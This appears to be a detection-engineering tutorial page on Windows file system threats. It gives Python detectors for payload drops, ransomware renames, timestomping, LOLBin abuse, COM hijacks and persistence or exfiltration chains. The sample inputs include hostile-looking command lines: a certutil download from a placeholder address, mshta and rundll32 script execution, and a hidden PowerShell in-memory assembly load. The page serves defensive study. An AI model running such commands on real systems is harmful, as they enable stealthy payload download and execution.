File system activity

Adversaries blend file system activity with living-off-the-land techniques: modifying legitimate files, staging payloads under innocuous names, and abusing trusted utilities to do the work. A seemingly benign file like C:\ProgramData\1.dat, followed within minutes by a new value under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run that references it, fits the persistence-staging pattern exactly. Tying both events to the same process, its parent, and an outbound connection completes the picture.

The four lifecycle events

01

Creation

New executables, DLLs, or configuration files in non-standard locations such as %APPDATA%, %LOCALAPPDATA%, %PROGRAMDATA% and %TEMP%. PowerShell creating DLLs in user directories. regsvr32.exe writing unexpected files.

02

Modification

Unexpected changes to system binaries, DLLs, or configuration files. Monitor C:\Windows\System32 for tampering (hash or signature changes outside patch windows). Watch trusted application directories for DLLs appearing next to a signed binary, the setup for sideloading.

03

Deletion

Sudden removal of logs, binaries, or staging files often signals cleanup. Watch for log clearing tied to other suspicious activity.

04

Access patterns

Large-scale sequential reads of sensitive datasets (customer databases, financial records, intellectual property) point to data staging.


Suspicious patterns by category

🔐 Persistence mechanisms

  • Registry autorun keys under HKLM\Software\Microsoft\Windows\CurrentVersion\Run or the per-user equivalent under HKCU
  • Scheduled tasks with obfuscated commands or unusual triggers
  • DLL search order hijacking: a malicious DLL placed in an application directory so the legitimate binary loads it instead of the intended library

💣 Payload deployment

  • New executables written into sensitive system directories (C:\Windows\Tasks, C:\Windows\System32) by anything other than an installer or update service
  • Files with double extensions (invoice.pdf.exe)
  • DLLs created in temporary or user folders

🔒 Ransomware activity

  • Bulk renaming of files with extensions like .locked or .encrypted
  • Rapid creation of ransom notes across many directories
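The two categories above translate into different detection shapes: payload deployment is a stateless check on each file event, while ransomware activity only shows up as a rate over a window. This is an added example, not code from the page, run over constructed Sysmon-style file events. The directory patterns, the installer allowlist and the thresholds (50 renames in 60 seconds, notes in 10 directories) are assumptions to tune per environment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Path heuristics for payload deployment. Patterns are assumptions; tune to the estate.
USER_DIRS = re.compile(
    r"^c:\\(users\\[^\\]+\\(appdata\\(local|roaming)|downloads|desktop)|programdata|windows\\temp)\\", re.I)
SYSTEM_DIRS = re.compile(r"^c:\\windows\\(system32|tasks)\\", re.I)
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|txt|jpe?g|png)\.(exe|scr|js|vbs|hta|bat|cmd)$", re.I)
EXEC_EXT = (".exe", ".dll", ".scr", ".sys")
# Processes assumed to legitimately write binaries into system directories.
INSTALLERS = {"msiexec.exe", "tiworker.exe", "trustedinstaller.exe"}


def score_file_create(ev):
    """Return the reasons a single FileCreate event matches a payload-deployment pattern."""
    path = ev["path"]
    name = path.rsplit("\\", 1)[-1].lower()
    writer = ev["image"].rsplit("\\", 1)[-1].lower()
    reasons = []
    if DOUBLE_EXT.search(name):
        reasons.append("double extension")
    if name.endswith(".dll") and USER_DIRS.search(path):
        reasons.append("DLL created in user or temp folder")
    if name.endswith(EXEC_EXT) and SYSTEM_DIRS.search(path) and writer not in INSTALLERS:
        reasons.append(f"{writer} wrote an executable into a system directory")
    if writer in ("powershell.exe", "pwsh.exe") and name.endswith((".dll", ".exe")):
        reasons.append("PowerShell dropped a binary")
    return reasons


RANSOM_EXT = (".locked", ".encrypted", ".crypt")
RANSOM_NOTE = re.compile(r"(readme|how.?to.?(decrypt|recover)|restore.?files).*\.(txt|html?|hta)$", re.I)


def detect_ransomware(events, rename_threshold=50, note_dirs_threshold=10, window=timedelta(seconds=60)):
    """Per process, flag (a) >= rename_threshold renames to a ransom extension inside a sliding
    window and (b) ransom notes created in >= note_dirs_threshold distinct directories."""
    recent = defaultdict(deque)   # proc -> timestamps of recent ransom-extension renames
    note_dirs = defaultdict(set)  # proc -> directories that received a ransom note
    alerts = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        proc, path = ev["proc"], ev["path"].lower()
        if ev["kind"] == "FileRename" and path.endswith(RANSOM_EXT):
            q = recent[proc]
            q.append(ev["ts"])
            while ev["ts"] - q[0] > window:   # drop timestamps that fell out of the window
                q.popleft()
            if len(q) >= rename_threshold:
                alerts.setdefault(proc, set()).add("bulk rename to ransom extension")
        elif ev["kind"] == "FileCreate" and RANSOM_NOTE.search(path.rsplit("\\", 1)[-1]):
            note_dirs[proc].add(path.rsplit("\\", 1)[0])
            if len(note_dirs[proc]) >= note_dirs_threshold:
                alerts.setdefault(proc, set()).add("ransom notes across many directories")
    return alerts


# Constructed sample events, not real telemetry. "proc" stands in for a process GUID.
T0 = datetime(2024, 1, 1, 9, 0, 0)
SAMPLE_EVENTS = [
    {"ts": T0, "kind": "FileCreate", "proc": "p1",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "path": r"C:\Users\alice\AppData\Roaming\helper.dll"},
    {"ts": T0, "kind": "FileCreate", "proc": "p2", "image": r"C:\Program Files\Outlook\outlook.exe",
     "path": r"C:\Users\alice\Downloads\invoice.pdf.exe"},
]
# One process renames 60 documents to .locked in 30 seconds and drops notes in 12 folders.
for i in range(60):
    SAMPLE_EVENTS.append({"ts": T0 + timedelta(seconds=i / 2), "kind": "FileRename", "proc": "p3",
                          "image": r"C:\Users\bob\AppData\Local\Temp\svc.exe",
                          "path": rf"D:\share\doc{i}.docx.locked"})
for i in range(12):
    SAMPLE_EVENTS.append({"ts": T0 + timedelta(seconds=i), "kind": "FileCreate", "proc": "p3",
                          "image": r"C:\Users\bob\AppData\Local\Temp\svc.exe",
                          "path": rf"D:\share\dir{i}\README_DECRYPT.txt"})

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS[:2]:
        print(ev["path"], "->", score_file_create(ev))
    print(detect_ransomware(SAMPLE_EVENTS))
```

The rename detector keys on the writing process rather than the host, because a backup agent or a user's own batch rename would otherwise trip the same threshold; the installer allowlist is the usual source of false positives and false negatives in the stateless checks and needs to be built from the estate's own patching telemetry.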

📦 Exfiltration staging

  • Large compressed archives (.zip, .rar, .7z) containing sensitive data appearing shortly before outbound transfers

File metadata that matters

Parsing has to do more than catch file events. The metadata on each file (timestamps, owner, size, hash, and for the process that wrote it the parent, command line and signing certificate) is where the signal often lives. In triage, metadata is often more diagnostic than the content itself.
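To make the metadata point concrete, here is an added example (not the page's code) that triages a file from its metadata alone: hash against a denylist, signer and owner against the directory it sits in, and the NTFS timestamps against each other. The records, the denylist (whose single entry is the SHA-256 of an empty file, a placeholder) and the trusted-directory list are constructed assumptions.

```python
from datetime import datetime, timedelta

TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\program files\\")
PE_EXT = (".exe", ".dll", ".sys")
# Assumed denylist. The one entry is the SHA-256 of the empty file, a placeholder rather than real malware.
KNOWN_BAD_SHA256 = {"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"}
# Owners expected for files in the trusted directories above (assumption; extend per environment).
SYSTEM_OWNERS = ("nt service\\trustedinstaller", "nt authority\\system", "builtin\\administrators")


def triage_metadata(meta):
    """Return findings derived only from the file's metadata, never from its content."""
    path = meta["path"].lower()
    findings = []
    if meta["sha256"] in KNOWN_BAD_SHA256:
        findings.append("hash on denylist")
    in_trusted = path.startswith(TRUSTED_DIRS)
    is_pe = path.endswith(PE_EXT)
    if in_trusted and is_pe and not meta.get("signer"):
        findings.append("unsigned PE in a trusted directory")
    if in_trusted and meta["owner"].lower() not in SYSTEM_OWNERS:
        findings.append(f"owner {meta['owner']} is unusual for this location")
    # $STANDARD_INFORMATION times are writable by the file's owner. Modified earlier than
    # created means the file was copied in with its source mtime or the times were altered.
    if meta["mtime"] < meta["ctime"] - timedelta(seconds=1):
        findings.append("modified before created: copied in or timestomped")
    # NTFS records 100 ns resolution; some timestomping tools write whole seconds only.
    if is_pe and meta["ctime"].microsecond == 0 and meta["mtime"].microsecond == 0:
        findings.append("zeroed sub-second timestamps")
    if is_pe and meta["size"] < 1024:
        findings.append("implausibly small PE")
    return findings


# Constructed metadata records in the shape a sensor or forensic parser might emit. All values are made up.
SAMPLE = [
    {"path": r"C:\Windows\System32\wbem\wmiprvse.exe", "sha256": "ab" * 32, "size": 496640,
     "signer": "Microsoft Windows", "owner": r"NT SERVICE\TrustedInstaller",
     "ctime": datetime(2023, 5, 2, 1, 15, 7, 123456), "mtime": datetime(2023, 5, 2, 1, 15, 7, 123456)},
    {"path": r"C:\Windows\System32\spool\drivers\x64\3\prnhelper.dll", "sha256": "cd" * 32, "size": 81920,
     "signer": None, "owner": r"CORP\alice",
     "ctime": datetime(2024, 1, 1, 9, 0, 0), "mtime": datetime(2019, 6, 15, 0, 0, 0)},
]

if __name__ == "__main__":
    for meta in SAMPLE:
        print(meta["path"], "->", triage_metadata(meta))
```

None of these checks needs the file's bytes; a sensor that ships hash, signer, owner and both timestamps with the create event lets the analyst rank it before anyone retrieves the sample.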


Fileless and LOLBin patterns

The hardest patterns to catch leave little or nothing on disk:

Memory-only execution

PowerShell loading a .NET assembly from a byte array with [System.Reflection.Assembly]::Load(), so the payload never touches disk.

WMI persistence

Scripts stored in the WMI repository or registry, executed by a permanent event subscription (filter, consumer and the binding between them).

COM hijacking

Registering a malicious server path for a legitimate CLSID under HKCU\Software\Classes, which takes precedence over the HKLM entry in the merged HKCR view and so hijacks the COM object without touching the system hive.

LOLBins

certutil.exe decoding Base64 payloads or fetching them with -urlcache. mshta.exe, wmic.exe and rundll32.exe for stealth execution of script embedded in the command line.
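Because these patterns leave little on disk, the telemetry to match is the process command line, the registry key path, and WMI subscription events rather than file events. The following is an added example (not the page's code) with one rule per pattern above, run over constructed inputs; the regexes, the placeholder SID and CLSID, and the WMI event shape are assumptions.

```python
import re

# Command-line rules for the LOLBin and memory-only patterns above. Regexes are assumptions; tune per estate.
LOLBIN_RULES = [
    ("certutil decode or download",
     re.compile(r"\bcertutil(\.exe)?\b.*\s-(decode|urlcache|encode)\b", re.I)),
    ("mshta running remote or inline script",
     re.compile(r"\bmshta(\.exe)?\b.*(https?:|vbscript:|javascript:)", re.I)),
    ("rundll32 inline javascript",
     re.compile(r"\brundll32(\.exe)?\b.*javascript:", re.I)),
    ("wmic process create or XSL stylesheet",
     re.compile(r"\bwmic(\.exe)?\b.*(process\s+call\s+create|/format:)", re.I)),
    ("PowerShell reflective assembly load",
     re.compile(r"\b(powershell|pwsh)(\.exe)?\b.*Reflection\.Assembly\]::Load\b", re.I)),
]
# COM hijack: a per-user CLSID server path shadows the HKLM one in the merged HKCR view.
# Sysmon records the user hive as HKU\<SID>\..., so match that form rather than HKCU.
COM_HIJACK = re.compile(
    r"^HKU\\[^\\]+\\Software\\Classes\\CLSID\\\{[0-9a-f-]+\}\\(InprocServer32|LocalServer32)", re.I)


def triage_process(cmdline):
    """Names of every LOLBin rule the command line matches."""
    return [name for name, rx in LOLBIN_RULES if rx.search(cmdline)]


def triage_registry(key):
    return ["COM hijack via per-user CLSID"] if COM_HIJACK.search(key) else []


def triage_wmi(ev):
    """WMI persistence: a newly created consumer that runs a command or script."""
    if ev["operation"] == "Created" and ev["consumer_type"] in (
            "CommandLineEventConsumer", "ActiveScriptEventConsumer"):
        return [f"WMI {ev['consumer_type']} created: {ev['destination']}"]
    return []


# Constructed command lines, keys and WMI events; hosts use reserved documentation addresses.
SAMPLE_CMDLINES = [
    r'certutil.exe -urlcache -split -f http://203.0.113.5/x.txt C:\Users\Public\x.txt',
    r'certutil -decode C:\Users\Public\x.txt C:\Users\Public\x.dll',
    r'mshta.exe vbscript:Execute("CreateObject(""WScript.Shell"").Run ""calc"":close")',
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write()',
    r'powershell.exe -nop -w hidden -c "[System.Reflection.Assembly]::Load($b).EntryPoint.Invoke($null,$null)"',
    r'certutil.exe -verify C:\Windows\System32\ntdll.dll',
]
SAMPLE_KEYS = [  # placeholder SID and CLSID, not real values
    r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32",
    r"HKLM\SOFTWARE\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32",
]
SAMPLE_WMI = [
    {"operation": "Created", "consumer_type": "CommandLineEventConsumer",
     "destination": r"powershell.exe -enc ..."},
    {"operation": "Created", "consumer_type": "NTEventLogEventConsumer", "destination": "Application"},
]

if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        print(triage_process(c), "<-", c[:60])
    for k in SAMPLE_KEYS:
        print(triage_registry(k), "<-", k[:60])
    for w in SAMPLE_WMI:
        print(triage_wmi(w))
```

The last certutil line is the control case: -verify is routine administration, and a rule that fires on the binary name alone rather than the decode or download switches will bury the real signal.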

File system activity frequently precedes exfiltration. A compressed archive created in %TEMP% shortly before an outbound connection to a low-reputation domain, from the same process, is a near-canonical pattern.
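Both the persistence-staging chain from the opening paragraph (staged file, Run key naming it, outbound connection) and the exfiltration-staging chain above are ordered sequences within one process, so one correlator serves both. This is an added example, not the page's code, run over constructed Sysmon-style events: the process GUIDs, addresses, the ten-minute window and the stand-in reputation lookup (a single name under the reserved .invalid TLD) are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

RUN_KEYS = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
STAGING_DIRS = re.compile(r"^c:\\(programdata|users\\[^\\]+\\appdata\\(local|roaming)|windows\\temp)\\", re.I)
ARCHIVE_EXT = (".zip", ".rar", ".7z")
# Assumed stand-in for a domain reputation feed. ".invalid" is reserved, so this is never a real host.
LOW_REPUTATION = {"files-sync.invalid"}


def _next_in_window(candidates, after, window):
    """First event in candidates that occurs after `after` and within `window` of it."""
    for ev in candidates:
        if after < ev["ts"] <= after + window:
            return ev
    return None


def correlate(events, window=timedelta(minutes=10)):
    """Group events by process GUID and look for two ordered chains:
    persistence staging: FileCreate in a staging dir -> Run value naming that file -> outbound connection
    exfiltration staging: archive created in a staging dir -> connection to a low-reputation host."""
    by_proc = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_proc[ev["pguid"]].append(ev)

    alerts = []
    for pguid, evs in by_proc.items():
        creates = [e for e in evs if e["type"] == "FileCreate" and STAGING_DIRS.search(e["path"])]
        runkeys = [e for e in evs if e["type"] == "RegistryValueSet" and RUN_KEYS.search(e["key"])]
        conns = [e for e in evs if e["type"] == "NetworkConnect"]
        for drop in creates:
            # The Run value must reference the dropped file; sharing a process is not enough.
            linked = [r for r in runkeys if drop["path"].lower() in r["value"].lower()]
            rk = _next_in_window(linked, drop["ts"], window)
            conn = rk and _next_in_window(conns, rk["ts"], window)
            if conn:
                alerts.append({"rule": "persistence staging", "pguid": pguid, "parent": drop["parent"],
                               "file": drop["path"], "key": rk["key"], "dst": conn["dst"]})
            if drop["path"].lower().endswith(ARCHIVE_EXT):
                low = [c for c in conns if c.get("host") in LOW_REPUTATION]
                conn = _next_in_window(low, drop["ts"], window)
                if conn:
                    alerts.append({"rule": "exfiltration staging", "pguid": pguid, "parent": drop["parent"],
                                   "file": drop["path"], "dst": conn["host"]})
    return alerts


# Constructed Sysmon-style events; GUIDs, hosts and addresses are made up.
T0 = datetime(2024, 3, 4, 10, 0, 0)
SAMPLE_EVENTS = [
    {"ts": T0, "type": "FileCreate", "pguid": "A", "parent": "winword.exe",
     "path": r"C:\ProgramData\1.dat"},
    {"ts": T0 + timedelta(seconds=5), "type": "RegistryValueSet", "pguid": "A", "parent": "winword.exe",
     "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     "value": r"rundll32.exe C:\ProgramData\1.dat,Start"},
    {"ts": T0 + timedelta(seconds=30), "type": "NetworkConnect", "pguid": "A", "parent": "winword.exe",
     "dst": "203.0.113.10"},
    {"ts": T0 + timedelta(minutes=1), "type": "FileCreate", "pguid": "B", "parent": "cmd.exe",
     "path": r"C:\Users\alice\AppData\Local\Temp\export.zip"},
    {"ts": T0 + timedelta(minutes=3), "type": "NetworkConnect", "pguid": "B", "parent": "cmd.exe",
     "dst": "198.51.100.7", "host": "files-sync.invalid"},
    # Benign control: an installer writes to ProgramData and never touches Run keys or the network.
    {"ts": T0 + timedelta(minutes=4), "type": "FileCreate", "pguid": "C", "parent": "msiexec.exe",
     "path": r"C:\ProgramData\Vendor\config.json"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Ordering is what separates this from a bag-of-indicators rule: a Run value written before the file it names exists, or a connection that precedes the archive, is a different (and usually benign) story, so each stage only looks forward from the previous one. The parent process is carried into the alert because it is what tells the analyst that winword.exe, not an installer, started the chain.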

Next up

Schema normalization

Unified shape for heterogeneous alerts. OCSF, STIX, OpenC2. Governance and sustainability.
